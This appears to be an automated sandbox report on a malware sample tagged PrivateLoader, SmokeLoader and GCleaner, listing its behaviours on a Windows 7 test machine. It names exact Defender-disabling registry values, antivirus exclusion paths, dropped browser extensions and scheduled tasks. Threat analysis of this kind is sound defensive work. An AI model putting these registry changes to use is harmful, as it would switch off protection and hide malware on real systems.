Analysis Overview
SHA256
4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
Threat Level: Known bad
The file 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5 was found to be: Known bad.
Malicious Activity Summary
Privateloader family
SmokeLoader
Windows security bypass
Modifies Windows Defender Real-time Protection settings
GCleaner
Smokeloader family
Gcleaner family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Indirect Command Execution
Reads user/profile data of web browsers
VMProtect packed file
Drops Chrome extension
Drops desktop.ini file(s)
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Program crash
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Runs ping.exe
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-11 08:10
Signatures
Privateloader family
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win7-20240903-en
Max time kernel
134s
Max time network
136s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe | N/A |
| N/A | N/A | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\YNUWFfCEdUiU2\GwoTZvaaIWAwO.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\LgEgoZU.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\QpigBxJgKxUn\BkwYORl.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\oWxSecJNU\wTvaWw.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\uuRcAjq.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\LsajhStaXkJRC\xCHUMIN.dll | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\LsajhStaXkJRC\NDjBuRm.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\oWxSecJNU\PkhsMVd.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| File created | C:\Program Files (x86)\YNUWFfCEdUiU2\gQNcOWE.xml | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\zeLHdclAQOoTZxj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\dBpreMcpfXbehynYz.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
